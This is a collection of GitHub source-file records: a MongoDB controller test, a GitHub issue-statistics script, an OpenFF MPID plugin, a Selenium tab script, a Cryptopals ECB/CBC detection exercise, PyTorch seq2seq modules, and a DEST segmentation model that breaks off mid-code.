set will move/clone the tmp doc into the base/primary doc collection and remove the tmp doc.\n '''\n db = self.g['db']\n usr = self.g['usr'] \n generic = controllers.Generic(self.g)\n\n # lets create a sample doc bypassing tmp process.\n doc = self.post_sample({'_c': 'Prs', 'fNam': 'Larry', 'lNam': 'King', 'suffix': 'Sr'})\n \n # now let's pretent to initiate an update of this doc\n response = generic.post(**{'docs': [doc]})\n \n # let's get the tmp doc\n src_doc_id = doc['_id']\n tmp_doc = db['cnts_tmp'].find_one({'_id': ObjectId(src_doc_id)})\n \n # UI will handle making changes to specific fields.\n # Let's make a sample change to the tmp doc.\n # NOTE: THIS IS A NO-NO.\n tmp_doc = db['cnts_tmp'].find_and_modify(\n query = {'_id': tmp_doc['_id']},\n update = {\"$set\": {'fNam2': 'Wayne'}},\n new = True\n ) \n \n # Once any updates are made to tmp/clone copy, update original/source doc. Then delete the temp doc.\n response = generic.post(**{'docs': [tmp_doc]})\n \n assert response['status'] == 200\n\n # let's get the sample source doc that should now have been updated from the tmp copy\n src_doc = db['cnts'].find_one({'_id': ObjectId(src_doc_id)})\n \n # should not be locked\n assert not src_doc['locked']\n \n # should have the sample change\n assert src_doc['fNam2'] == 'Wayne'\n \n # tmp doc should have been removed\n assert not db['cnts_tmp'].find_one({'_id': ObjectId(src_doc_id)}) \n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"LarryEitel/gsapi","sub_path":"gsapi/tests/controllers/test_generic_mongo.py","file_name":"test_generic_mongo.py","file_ext":"py","file_size_in_byte":12803,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"31298305169","text":"#!/usr/bin/env python3.6\n\nimport requests\nimport json\nimport sys\nimport os\nfrom functools import reduce\nimport datetime\n\nCYCLE_TIME_COLUMNS = ['To do', 'In progress', 'Review', 'Testing']\n\nclass GithubSearch(object):\n config = {}\n issues = {}\n weeks_date = {}\n githubEvents = None\n\n def __init__(self, config, until_date, githubEvents):\n self.config = config\n self.weeks_date = self.__getLastFourWeeksByDate(until_date)\n self.githubEvents = githubEvents\n\n def __githubRequest(self, endpoint, payload):\n uri = self.config['github']['api_uri'] + endpoint\n headers = {\n 'Content-Type': 'application/json',\n 'Accept': 'application/vnd.github.symmetra-preview+json',\n 'Authorization': 'token {0}'.format(self.config['github']['api_token'])\n }\n response = requests.get(uri, params=payload, headers=headers)\n return response\n\n def getIssuesFromMonth(self):\n payload = {\n 'q': 'repo:{1} is:issue is:closed closed:>={0}'.format(\n self.weeks_date['last_week3'].strftime('%Y-%m-%d'),\n self.config['github']['repository_path']\n ),\n 'per_page': 100\n }\n response = self.__githubRequest('search/issues', payload)\n\n return response.json()\n\n def __getLastFourWeeksByDate(self, until_date):\n n_of_days_til_sunday = (until_date.weekday() + 1) % 7\n this_week = until_date - datetime.timedelta(days=n_of_days_til_sunday)\n this_week = this_week.replace(hour=0, minute=0, second=0, microsecond=0)\n\n return {\n 'this_week': this_week,\n 'last_week1': this_week - datetime.timedelta(days=7),\n 'last_week2': this_week - datetime.timedelta(days=14),\n 'last_week3': this_week - datetime.timedelta(days=21)\n }\n\n def __getIssuesByLabel(self, filter_label, issues):\n filtered_items = list(filter(\n lambda item: filter_label in [label['name'] for label in item['labels']],\n issues\n ))\n\n return filtered_items\n\n def __getIssuesByAssignee(self, filter_assignee, issues):\n filtered_items = list(filter(\n lambda item: filter_assignee in [assignee['login'] for assignee in item['assignees']],\n issues\n ))\n\n pair_count = reduce(\n lambda count, n_assignees: count + (1 if n_assignees > 1 else 0),\n [len(item['assignees']) for item in filtered_items],\n 0\n )\n\n return {\n 'items': filtered_items,\n 'pair_count': pair_count\n }\n\n def __filterIssuesByDate(self, issue, date):\n closed_date = issue['closed_at']\n closed_date = datetime.datetime.strptime(closed_date[:-10], '%Y-%m-%d')\n\n date_end = date + datetime.timedelta(days=6)\n return closed_date >= date and closed_date <= date_end\n\n def calcCycleTimeAvg(self, issues, cardsCyclesTimes):\n cycleTimeTotal = 0\n leadTimeTotal = 0\n cyclesByColumn = {}\n\n for issue in issues:\n issueCycles = cardsCyclesTimes[issue['id']]\n for cycle in issueCycles:\n if cycle['column'] not in cyclesByColumn:\n cyclesByColumn[cycle['column']] = 0\n cyclesByColumn[cycle['column']] += cycle['duration']\n\n if cycle['column'] in CYCLE_TIME_COLUMNS:\n cycleTimeTotal += cycle['duration']\n\n leadTimeTotal += cycle['duration']\n\n cyclesByColumnAvg = []\n for column, duration in cyclesByColumn.items():\n cyclesByColumnAvg.append({\n 'column': column,\n 'duration': duration / len(issues)\n })\n\n return {\n 'cycle_time_total_avg': cycleTimeTotal / len(issues),\n 'lead_time_total_avg': leadTimeTotal / len(issues),\n 'cycle_by_column_avg': cyclesByColumnAvg\n }\n\n def getResultByWeek(self, since_date):\n filtered_issues = list(filter(\n lambda issue: self.__filterIssuesByDate(issue, since_date),\n self.issues['items']\n ))\n\n cyclesTimesAvg = {}\n if filtered_issues:\n cardsCyclesTimes = self.githubEvents.getCardsCyclesTimes(filtered_issues)\n cyclesTimesAvg = self.calcCycleTimeAvg(filtered_issues, cardsCyclesTimes)\n\n result = {\n 'week_date': since_date.strftime('%Y-%m-%d'),\n 'total_tasks': len(filtered_issues),\n 'collaborators': [],\n 'labels': []\n }\n\n data_result = {**result, **cyclesTimesAvg}\n\n for assignee in self.config['collaborators']:\n name = assignee['name']\n if 'company' in assignee.keys():\n company = ' ({0})'.format(assignee['company'])\n name = name + company\n\n response = self.__getIssuesByAssignee(assignee['username'], filtered_issues)\n\n data_result['collaborators'].append({\n 'name': name,\n 'tasks_count': len(response['items']),\n 'pair_count': response['pair_count']\n })\n\n for label in self.config['labels']:\n items = self.__getIssuesByLabel(label, filtered_issues)\n data_result['labels'].append({\n 'label': label,\n 'tasks_count': len(items)\n })\n\n\n return data_result\n","repo_name":"eucleciojosias/git-kanban-cli","sub_path":"python/scripts/githubsearch.py","file_name":"githubsearch.py","file_ext":"py","file_size_in_byte":5453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"71206358620","text":"from typing import TYPE_CHECKING, Dict, List, Literal, Optional, Set, Tuple, Union\n\nimport openmm\nfrom openff.interchange import Interchange\nfrom openff.interchange.components.potentials import Potential\nfrom openff.interchange.models import PotentialKey, TopologyKey\nfrom openff.interchange.smirnoff._nonbonded import SMIRNOFFCollection\nfrom openff.models.types import FloatQuantity\nfrom openff.toolkit import Topology\nfrom openff.toolkit.typing.engines.smirnoff.parameters import (\n ParameterAttribute,\n ParameterHandler,\n ParameterType,\n _allow_only,\n unit,\n)\n\nif TYPE_CHECKING:\n from openff.interchange.models import VirtualSiteKey\n\n# https://docs.openforcefield.org/projects/interchange/en/v0.3.0-staging/using/plugins.html\n\n\nclass MultipoleKey(TopologyKey):\n pass\n\n\nclass PolarizabilityKey(TopologyKey):\n pass\n\n\nclass MPIDMultipoleHandler(ParameterHandler):\n \"\"\"\n \n \n \n \n \n \n \n \n \"\"\"\n\n class MPIDMultipole(ParameterType):\n _VALENCE_TYPE = \"Atom\"\n _ELEMENT_NAME = \"Multipole\"\n\n # This is just the charge, which is handled here instead of the NonbondedForce\n c0 = ParameterAttribute(default=None, unit=unit.elementary_charge)\n\n _TAGNAME = \"MPIDMultipole\"\n _INFOTYPE = MPIDMultipole\n\n # https://github.com/andysim/MPIDOpenMMPlugin/blob/43450d73e567772e8892cabf9dde7f6c34913e4e/examples/ethane_water_charge_only/ethane_water.xml#L57\n coulomb14scale = ParameterAttribute(default=1.0, converter=float)\n\n\nclass MPIDPolarizabilityHandler(ParameterHandler):\n class MPIDPolarizability(ParameterType):\n _VALENCE_TYPE = \"Atom\"\n _ELEMENT_NAME = \"Polarizability\"\n\n polarizabilityXX = ParameterAttribute(default=None, unit=unit.nanometer**3)\n polarizabilityYY = ParameterAttribute(default=None, unit=unit.nanometer**3)\n polarizabilityZZ = ParameterAttribute(default=None, unit=unit.nanometer**3)\n\n thole = ParameterAttribute(default=None, unit=unit.dimensionless)\n\n _TAGNAME = \"MPIDPolarizability\"\n _INFOTYPE = MPIDPolarizability\n\n # https://github.com/andysim/MPIDOpenMMPlugin/blob/43450d73e567772e8892cabf9dde7f6c34913e4e/examples/ethane_water_charge_only/ethane_water.xml#L57\n coulomb14scale = ParameterAttribute(default=1.0, converter=float)\n\n\nclass MPIDCollection(SMIRNOFFCollection):\n type: Literal[\"MPID\"] = \"MPID\"\n\n expression: str = \"\"\n\n @classmethod\n def allowed_parameter_handlers(cls):\n return [MPIDMultipoleHandler, MPIDPolarizabilityHandler]\n\n @classmethod\n def supported_parameters(cls):\n return (\n \"smirks\",\n \"id\",\n \"c0\",\n \"polarizabilityXX\",\n \"polarizabilityYY\",\n \"polarizabilityZZ\",\n \"thole\",\n )\n\n def store_potentials(\n self,\n parameter_handler: List[ParameterHandler],\n topology: \"Topology\",\n ) -> None:\n \"\"\"Populate self.key_map with key-val pairs of [TopologyKey, PotentialKey].\"\"\"\n self.key_map: Dict[TopologyKey, PotentialKey] = dict()\n\n # Assume there are two parameter handlers, one for multipole and one for polarizability\n multipole_handler = [\n x for x in parameter_handler if x.TAGNAME == \"MPIDMultipole\"\n ][0]\n polarizability_handler = [\n x for x in parameter_handler if x.TAGNAME == \"MPIDPolarizability\"\n ][0]\n\n # The multipole stores charges, so assume all atoms have a multipole\n multipole_matches = multipole_handler.find_matches(topology)\n\n # not all atoms have polarizbility\n polarizability_handler = polarizability_handler.find_matches(topology)\n\n # WW has custom charges (stored as multipole parameters) using a custom model,\n # which has potentially many smirks-to-charge mappings. By contrast, there are\n # only polarizability terms on CHON atoms, and (for now) all C have the same\n # polarizability parameters, all hydrogens, etc. (In the future there may be more,\n # or more complex SMIRKS patterns.) So need to store the different types of keys,\n # cannot collapse them.\n for key, val in multipole_matches.items():\n topology_key = MultipoleKey(atom_indices=key)\n potential_key = PotentialKey(\n id=val.parameter_type.smirks,\n associated_handler=parameter_handler.TAGNAME,\n )\n self.key_map[topology_key] = potential_key\n\n for key, val in polarizability_handler.items():\n topology_key = PolarizabilityKey(atom_indices=key)\n potential_key = PotentialKey(\n id=val.parameter_type.smirks,\n associated_handler=parameter_handler.TAGNAME,\n )\n self.key_map[topology_key] = potential_key\n\n def store_potentials(self, parameter_handler: List[ParameterHandler]):\n multipole_handler = [\n x for x in parameter_handler if x.TAGNAME == \"MPIDMultipole\"\n ][0]\n polarizability_handler = [\n x for x in parameter_handler if x.TAGNAME == \"MPIDPolarizability\"\n ][0]\n\n self.coulomb14scale = parameter_handler[0].coulomb14scale\n\n for potential_key in self.key_map.values():\n if potential_key.associated_handler == \"MPIDMultipole\":\n smirks = potential_key.id\n parameter = multipole_handler.parameters[smirks]\n\n self.potentials[potential_key] = Potential(\n parameters={\"c0\": parameter.c0}\n )\n\n if potential_key.associated_handler == \"MPIDPolarizability\":\n smirks = potential_key.id\n parameter = polarizability_handler.parameters[smirks]\n\n self.potentials[potential_key] = Potential(\n parameters={\n \"polarizabilityXX\": parameter.polarizabilityXX,\n \"polarizabilityYY\": parameter.polarizabilityYY,\n \"polarizabilityZZ\": parameter.polarizabilityZZ,\n \"thole\": parameter.thole,\n }\n )\n\n @classmethod\n def create(\n cls,\n parameter_handler: List[ParameterAttribute],\n topology: Topology,\n ):\n # Assume the two handlers have the same coluomb14scale\n handler = cls(\n coulomb14scale=parameter_handler[0].coulomb14scale,\n )\n\n handler.store_matches(parameter_handler=parameter_handler, topology=topology)\n handler.store_potentials(parameter_handler=parameter_handler)\n\n return handler\n\n @classmethod\n def check_openmm_requirements(cls, combine_nonbonded_forces: bool) -> None:\n \"\"\"Later, when setting charges to 0, we will assume that there's just one NonbondedForce.\"\"\"\n assert combine_nonbonded_forces\n\n def modify_openmm_forces(\n self,\n interchange: Interchange,\n system: openmm.System,\n add_constrained_forces: bool,\n constrained_pairs: Set[Tuple[int, ...]],\n particle_map: Dict[Union[int, \"VirtualSiteKey\"], int],\n ):\n # Set the charges on the nonbonded force to be zero\n nonbonded_force = [\n force\n for force in system.getForces()\n if isinstance(force, openmm.NonbondedForce)\n ][0]\n\n for particle_index in range(nonbonded_force.getNumParticles()):\n _, sigma, epsilon = nonbonded_force.getParticleParameters(particle_index)\n nonbonded_force.setParticleParameters(\n particle_index, 0.0 * unit.elementary_charge, sigma, epsilon\n )\n\n # Pesudocode from here to end of file!\n # Create the MPID force\n mpid_collection = interchange.collections[\"MPID\"]\n\n mpid_force = openmm.MPIDForce(coulomb14scale=mpid_collection.coulomb14scale)\n system.addForce(mpid_force)\n\n # Set the multipole and polarizability parameters on the force\n for topology_key, potential_key in mpid_collection.potentials.items():\n openff_particle_index = topology_key.atom_indices[0]\n openmm_particle_index = particle_map[openff_particle_index]\n\n if isinstance(topology_key, MultipoleKey):\n multipole: Potential = mpid_collection.potentials[potential_key]\n # Set multipole on multipole force using OpenMM particle index,\n # c0 from `potential_key.parameters['c0']`\n mpid_force.addMultipole(...)\n\n if isinstance(topology_key, PolarizabilityKey):\n polarizability: Potential = mpid_collection.potentials[potential_key]\n # Set polarizability on multipole force using OpenMM particle index,\n # polarizabilityXX, polarizabilityYY, polarizabilityZZ, thole from\n # `potential_key.parameters['polarizabilityXX']`, etc.\n mpid_force.addPolarizability(...)\n\n # Plus whatever other housekeeping needs to happen with the OpenMM forces\n","repo_name":"openforcefield/MPID_plugin","sub_path":"mpid_plugin/nonbonded.py","file_name":"nonbonded.py","file_ext":"py","file_size_in_byte":9455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72990477019","text":"from selenium import webdriver\nimport time\n\nfrom selenium.webdriver.chrome.service import Service\noptions = webdriver.ChromeOptions()\noptions.add_argument(\"--start-maximized\")\noptions.add_argument('--log-level=3')\noptions.binary_location = \"C:\\\\Program Files\\\\BraveSoftware\\\\Brave-Browser\\\\Application\\\\brave.exe\"\npath=Service(\"C:\\Program Files\\BraveSoftware\\Brave-Browser\\Application\\108.1.46.144\")\ndriver = webdriver.Chrome(service=path,options=options)\n# Open 200 tabs\nfor i in range(200):\n driver.get('https://www.google.com')\n \n# Wait for 10 seconds\ntime.sleep(10)\n\n# Close all tabs and quit the browser\ndriver.quit()\n","repo_name":"u2508/All-Programs","sub_path":"PYTHON/200tabs.py","file_name":"200tabs.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11074204545","text":"import aes\nimport random\nfrom tools import split_blocks\n\n\ndef get_rand_bytes(size=16):\n return bytes([random.randint(0, 255) for _ in range(size)])\n\n\ndef encryption_oracle(inp):\n begin = get_rand_bytes(random.randint(5, 10))\n end = get_rand_bytes(random.randint(5, 10))\n key = get_rand_bytes(16)\n data = begin + inp + end\n if random.randint(0, 1):\n return (aes.encrypt_ecb_aes(data, key), 0)\n else:\n return (aes.cbc_encrypt(data, key, get_rand_bytes(16)), 1)\n\n\ndef main():\n inp = bytes(70)\n data_set = []\n for _ in range(10):\n enc = ''\n data, answer = encryption_oracle(inp)\n reps = len(split_blocks(data, 16)) - len(set(split_blocks(data, 16)))\n if answer == 0:\n enc = 'ECB'\n else:\n enc = 'CBC'\n data_set.append((enc, reps))\n for element in data_set:\n print(element)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"drseilzug/cryptopals","sub_path":"11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70772448861","text":"# coding=utf-8\n\"\"\"\n@Author: 李扬名\n@StartTime: 18/11/18\n@FileName: test.py\n@Software: Pycharm\n@LastModify: 18/11/19\n\"\"\"\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\n\n\nSOS_TOKEN = 0\nEOS_TOKEN = 1\n\n# 这里是限制输入句子的长度, 且不包含标点符号.\nMAX_LENGTH = 3\n\n\nclass Lang:\n\n def __init__(self, name):\n self._name = name\n self._word2index = {}\n self._index2word = {0: \"SOS\", 1: \"EOS\"}\n self._n_words = 2\n\n def add_sent(self, sent):\n for word in sent.split():\n self.add_word(word)\n\n def add_word(self, word):\n if word not in self._word2index.keys():\n self._word2index[word] = self._n_words\n self._index2word[self._n_words] = word\n self._n_words += 1\n\n def get_index(self, word):\n return self._word2index[word]\n\n def get_word(self, index):\n return self._index2word[index]\n\n def sent2index(self, sent, set_sos, set_eos):\n word_list = sent.strip().split()\n i_list = [self.get_index(word) for word in word_list]\n\n if set_sos:\n i_list.insert(0, SOS_TOKEN)\n if set_eos:\n i_list.append(EOS_TOKEN)\n\n return i_list\n\n def __len__(self):\n return self._n_words\n\n\nclass EncoderRNN(nn.Module):\n\n def __init__(self, input_dim, hidden_dim):\n super(EncoderRNN, self).__init__()\n self._hidden_dim = hidden_dim\n\n self._embedding = nn.Embedding(input_dim, hidden_dim)\n self._gru = nn.GRU(hidden_dim, hidden_dim)\n\n @property\n def hidden_dim(self):\n return self._hidden_dim\n\n def forward(self, input_x, hidden):\n embedded_x = self._embedding(input_x).view(1, 1, -1)\n output_x, hidden_x = self._gru(embedded_x, hidden)\n return output_x, hidden_x\n\n def init_hidden(self):\n return Variable(torch.zeros(1, 1, self._hidden_dim))\n\n\nclass DecoderRNN(nn.Module):\n\n def __init__(self, hidden_dim, output_dim, dropout_p=0.1):\n super(DecoderRNN, self).__init__()\n self._hidden_dim = hidden_dim\n\n self._embedding = nn.Embedding(hidden_dim, output_dim)\n self._gru = nn.GRU(hidden_dim, hidden_dim)\n self._out = nn.Linear(hidden_dim, output_dim)\n self._dropout = nn.Dropout(dropout_p)\n\n def forward(self, input_x, hidden):\n embedded_x = self._embedding(input_x).view(1, 1, -1)\n dropout_x = self._dropout(embedded_x)\n\n relu_x = F.relu(dropout_x)\n gru_x, out_hidden = self._gru(relu_x, hidden)\n out_x = F.softmax(self._out(gru_x[0]))\n return out_x, out_hidden\n\n def init_hidden(self):\n return Variable(torch.zeros(1, 1, self._hidden_dim))\n\n\nclass AttnDecoderRNN(nn.Module):\n\n def __init__(self, hidden_dim, output_dim, dropout_p=0.1):\n super(AttnDecoderRNN, self).__init__()\n self._hidden_dim = hidden_dim\n\n self._embedding = nn.Embedding(output_dim, hidden_dim)\n self._attn = nn.Linear(hidden_dim * 2, MAX_LENGTH + 2)\n self._combine = nn.Linear(hidden_dim * 2, hidden_dim)\n self._dropout = nn.Dropout(dropout_p)\n self._gru = nn.GRU(hidden_dim, hidden_dim)\n self._out = nn.Linear(hidden_dim, output_dim)\n\n def forward(self, input_x, hidden, e_hidden):\n embedded_x = self._embedding(input_x).view(1, 1, -1)\n dropout_x = self._dropout(embedded_x)\n\n attn_weight = F.softmax(\n self._attn(torch.cat([dropout_x[0], hidden[0]], dim=1)), dim=1\n )\n\n # bmm 是 batch mm, 即 batch 矩阵乘法.\n attn_hidden = torch.bmm(\n attn_weight.unsqueeze(0), e_hidden.unsqueeze(0)\n )\n\n cat_x = torch.cat([dropout_x[0], attn_hidden[0]], dim=1)\n combine_x = self._combine(cat_x).unsqueeze(0)\n\n relu_x = F.relu(combine_x)\n gru_x, gru_hidden = self._gru(relu_x, hidden)\n\n out_x = F.log_softmax(self._out(gru_x[0]), dim=1)\n return out_x, gru_hidden, attn_weight\n\n def init_hidden(self):\n return Variable(torch.zeros(1, 1, self._hidden_dim))\n","repo_name":"LeePleased/Seq2Seq-MachineTranslation","sub_path":"refer.py","file_name":"refer.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"22742437374","text":"from typing import Union, Tuple, Optional, List\nimport math\n\nimport torch.nn as nn\nimport torch\nfrom timm.models.layers import to_2tuple, trunc_normal_\n\n\nclass OverlapPatchEmbed(nn.Module):\n \"\"\"\n DEST overlap patch embedding.\n diff with segformer:\n * BatchNorm instead of LayerNorm\n \"\"\"\n def __init__(self,\n in_channels: int,\n out_channels: int,\n patch_size: Union[int, Tuple[int, int]] = 7,\n stride: int = 4,\n ):\n super().__init__()\n patch_size = to_2tuple(patch_size)\n\n self.patch_size = patch_size\n self.out_channels = out_channels\n\n self.proj = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=patch_size, stride=stride,\n padding=(patch_size[0] // 2, patch_size[1] // 2), bias=False),\n nn.BatchNorm2d(out_channels)\n )\n self.flatten_spatial = nn.Flatten(start_dim=2)\n self.apply(self._init_weights)\n\n def _init_weights(self, m):\n if isinstance(m, nn.Conv2d):\n fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n fan_out //= m.groups\n m.weight.data.normal_(0, math.sqrt(2.0 / fan_out))\n if m.bias is not None:\n m.bias.data.zero_()\n\n def forward(self, x):\n x = self.proj(x)\n _, _, H, W = x.size()\n x = self.flatten_spatial(x)\n return x, H, W\n\n\nclass SimplifiedAttention(nn.Module):\n def __init__(self,\n embed_dim: int,\n num_heads: int = 8,\n qk_scale: Optional[float] = None,\n sr_ratio: int = 1):\n super().__init__()\n assert embed_dim % num_heads == 0, f\"embed_dim {embed_dim} should be divided by num_heads {num_heads}.\"\n\n self.embed_dim = embed_dim\n self.num_heads = num_heads\n head_dim = embed_dim // num_heads\n self.scale = qk_scale or head_dim ** -0.5\n\n self.q = nn.Conv1d(embed_dim, embed_dim, kernel_size=1, bias=False)\n\n self.sr_ratio = sr_ratio\n if sr_ratio > 1:\n self.spatial_reduction = nn.Sequential(\n nn.Conv2d(embed_dim, embed_dim, kernel_size=sr_ratio, stride=sr_ratio,\n bias=False),\n nn.BatchNorm2d(embed_dim)\n )\n self.flatten_spatial = nn.Flatten(start_dim=2)\n\n self.k = nn.Conv1d(embed_dim, embed_dim, kernel_size=1, bias=False)\n\n # TODO - with BN??\n self.proj = nn.Sequential(\n nn.Conv1d(embed_dim, embed_dim, kernel_size=1, bias=False),\n nn.BatchNorm1d(embed_dim)\n )\n self.apply(self._init_weights)\n\n def _init_weights(self, m):\n if isinstance(m, nn.Conv2d):\n fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n fan_out //= m.groups\n m.weight.data.normal_(0, math.sqrt(2.0 / fan_out))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.Conv1d):\n fan_out = m.kernel_size[0] * m.out_channels\n fan_out //= m.groups\n m.weight.data.normal_(0, math.sqrt(2.0 / fan_out))\n if m.bias is not None:\n m.bias.data.zero_()\n\n def forward(self, x, H, W):\n B, C, N = x.shape\n\n q = self.q(x).reshape(B, self.num_heads, C // self.num_heads, N).permute(0, 1, 3, 2)\n\n if self.sr_ratio > 1:\n x_ = x.reshape(B, C, H, W)\n x_ = self.spatial_reduction(x_)\n x_ = self.flatten_spatial(x_)\n k = self.k(x_).reshape(B, self.num_heads, C // self.num_heads, -1).permute(0, 1, 2, 3)\n else:\n k = self.k(x).reshape(B, self.num_heads, C // self.num_heads, -1).permute(0, 1, 2, 3)\n\n attn = torch.matmul(q, k) * self.scale\n attn = attn.max(dim=-1, keepdims=False)[0]\n\n attn = attn.transpose(-1, -2)\n v = x.mean(dim=-1, keepdims=True).expand(B, C, self.num_heads).transpose(-1, -2)\n\n x = torch.matmul(attn, v).transpose(-1, -2)\n x = self.proj(x)\n return x\n\n\nclass MixFFN(nn.Module):\n def __init__(self,\n in_channels: int,\n out_channels: int,\n expansion_ratio: float):\n super().__init__()\n hidden_channels = int(in_channels * expansion_ratio)\n self.fc1 = nn.Sequential(\n nn.Conv1d(in_channels, hidden_channels, kernel_size=1, bias=False),\n nn.BatchNorm1d(hidden_channels),\n )\n self.dw_conv = nn.Sequential(\n nn.Conv2d(hidden_channels, hidden_channels, kernel_size=3, padding=1, groups=hidden_channels, bias=False),\n nn.BatchNorm2d(hidden_channels),\n nn.ReLU()\n )\n self.fc2 = nn.Conv1d(hidden_channels, out_channels, kernel_size=1)\n self.apply(self._init_weights)\n\n def _init_weights(self, m):\n if isinstance(m, nn.Conv2d):\n fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n fan_out //= m.groups\n m.weight.data.normal_(0, math.sqrt(2.0 / fan_out))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.Conv1d):\n fan_out = m.kernel_size[0] * m.out_channels\n fan_out //= m.groups\n m.weight.data.normal_(0, math.sqrt(2.0 / fan_out))\n if m.bias is not None:\n m.bias.data.zero_()\n\n def forward(self, x, H, W):\n x = self.fc1(x)\n B, C, N = x.size()\n x = x.reshape(B, C, H, W)\n x = self.dw_conv(x)\n x = torch.flatten(x, 2)\n x = self.fc2(x)\n return x\n\n\nclass Block(nn.Module):\n def __init__(self,\n embed_dims: int,\n num_heads: int,\n mlp_ratio: float,\n sr_ratio: int = 1,\n qk_scale: Optional[float] = None):\n super().__init__()\n self.norm1 = nn.BatchNorm1d(embed_dims)\n self.attn = SimplifiedAttention(embed_dims, num_heads=num_heads, sr_ratio=sr_ratio, qk_scale=qk_scale)\n self.norm2 = nn.BatchNorm1d(embed_dims)\n self.mix_ffn = MixFFN(embed_dims, embed_dims, expansion_ratio=mlp_ratio)\n\n def forward(self, x, H, W):\n x = x + self.attn(self.norm1(x), H, W)\n x = x + self.mix_ffn(self.norm2(x), H, W)\n return x\n\n\nclass EncoderStage(nn.Module):\n def __init__(self,\n in_channels: int,\n out_channels: int,\n patch_size: int,\n stride: int,\n num_blocks: int,\n num_heads: int,\n mlp_ratio: float,\n sr_ratio: int):\n super().__init__()\n self.path_embed = OverlapPatchEmbed(in_channels, out_channels, patch_size=patch_size, stride=stride)\n\n self.blocks = nn.ModuleList([\n Block(\n embed_dims=out_channels, num_heads=num_heads, mlp_ratio=mlp_ratio, sr_ratio=sr_ratio\n ) for _ in range(num_blocks)\n ])\n\n def forward(self, x):\n x, H, W = self.path_embed(x)\n for block in self.blocks:\n x = block(x, H, W)\n return x, H, W\n\n\nclass Encoder(nn.Module):\n def __init__(self,\n in_channels: int,\n width_list: List[int],\n patch_sizes: List[int],\n strides_list: List[int],\n num_blocks: List[int],\n num_heads: List[int],\n mlp_ratios: List[float],\n sr_ratios: List[int],\n is_out_feature_list: List[bool]):\n super().__init__()\n self.is_out_feature_list = is_out_feature_list\n self.width_list = width_list\n\n num_stages = len(width_list)\n self.stages = nn.ModuleList()\n\n for i in range(num_stages):\n self.stages.append(\n EncoderStage(\n in_channels, out_channels=width_list[i], patch_size=patch_sizes[i], stride=strides_list[i],\n num_blocks=num_blocks[i], num_heads=num_heads[i], mlp_ratio=mlp_ratios[i], sr_ratio=sr_ratios[i]\n ))\n in_channels = width_list[i]\n\n def encoder_out_channels(self) -> List[int]:\n \"\"\"\n :return: num channels list of out feature maps.\n \"\"\"\n return [ch for ch, is_out in zip(self.width_list, self.is_out_feature_list) if is_out]\n\n def forward(self, x) -> List[torch.Tensor]:\n B = x.size(0)\n out_list = []\n for i, stage in enumerate(self.stages):\n x, H, W = stage(x)\n x = x.reshape(B, -1, H, W)\n if self.is_out_feature_list[i]:\n out_list.append(x)\n return out_list\n\n\nclass UpFPNBlock(nn.Module):\n \"\"\"\n Fuse features from the encoder. Upsample is done by bilinear upsample.\n \"\"\"\n\n def __init__(self, in_channels: int, skip_channels: int):\n super().__init__()\n self.up_path = nn.Sequential(\n nn.Conv2d(in_channels, skip_channels, kernel_size=1, bias=False),\n nn.BatchNorm2d(skip_channels),\n nn.ReLU(),\n nn.Upsample(scale_factor=2, mode=\"bilinear\")\n )\n\n self.skip_path = nn.Sequential(\n nn.Conv2d(skip_channels, skip_channels, kernel_size=1, bias=False),\n nn.BatchNorm2d(skip_channels),\n )\n\n def forward(self, x, skip):\n x = self.up_path(x)\n skip = self.skip_path(skip)\n return x + skip\n\n\nclass DecoderFPN(nn.Module):\n def __init__(\n self,\n skip_channels_list: List[int],\n ):\n \"\"\"\n \"\"\"\n super().__init__()\n self.up_channels_list = skip_channels_list\n # Reverse order to up-bottom order, i.e [stage4_ch, stage3_ch, ... , stage1_ch]\n self.up_channels_list.reverse()\n # Remove last stage num_channels, as it is the input to the decoder.\n in_channels = self.up_channels_list.pop(0)\n\n self.up_stages = nn.ModuleList()\n for out_channels in self.up_channels_list:\n self.up_stages.append(UpFPNBlock(in_channels, out_channels))\n in_channels = out_channels\n\n def forward(self, feats: List[torch.Tensor]):\n # Reverse order to up-bottom order, i.e [stage4_ch, stage3_ch, ... , stage1_ch]\n feats.reverse()\n # Remove last stage feature map, as it is the input to the decoder and not a skip connection.\n x = feats.pop(0)\n for up_stage, skip in zip(self.up_stages, feats):\n x = up_stage(x, skip)\n return x\n\n\nclass SegHead(nn.Module):\n def __init__(self, in_channels: int, num_classes: int):\n super().__init__()\n self.head = nn.Sequential(\n nn.Upsample(scale_factor=2, mode=\"bilinear\"),\n nn.Conv2d(in_channels, in_channels, kernel_size=3, padding=1, bias=False),\n nn.BatchNorm2d(in_channels),\n nn.ReLU(),\n nn.Conv2d(in_channels, num_classes, kernel_size=1, bias=True)\n )\n\n def forward(self, x):\n return self.head(x)\n\n\nclass DepthHead(nn.Module):\n def __init__(self, in_channels: int, num_classes: int):\n super().__init__()\n self.head = nn.Sequential(\n nn.Upsample(scale_factor=2, mode=\"bilinear\"),\n nn.Conv2d(in_channels, in_channels, kernel_size=1, bias=True),\n nn.BatchNorm2d(in_channels),\n nn.ReLU(),\n nn.Upsample(scale_factor=2, mode=\"bilinear\"),\n nn.Conv2d(in_channels, in_channels, kernel_size=3, padding=1, bias=False),\n nn.BatchNorm2d(in_channels),\n nn.ReLU(),\n nn.Conv2d(in_channels, num_classes, kernel_size=1, bias=True)\n )\n\n def forward(self, 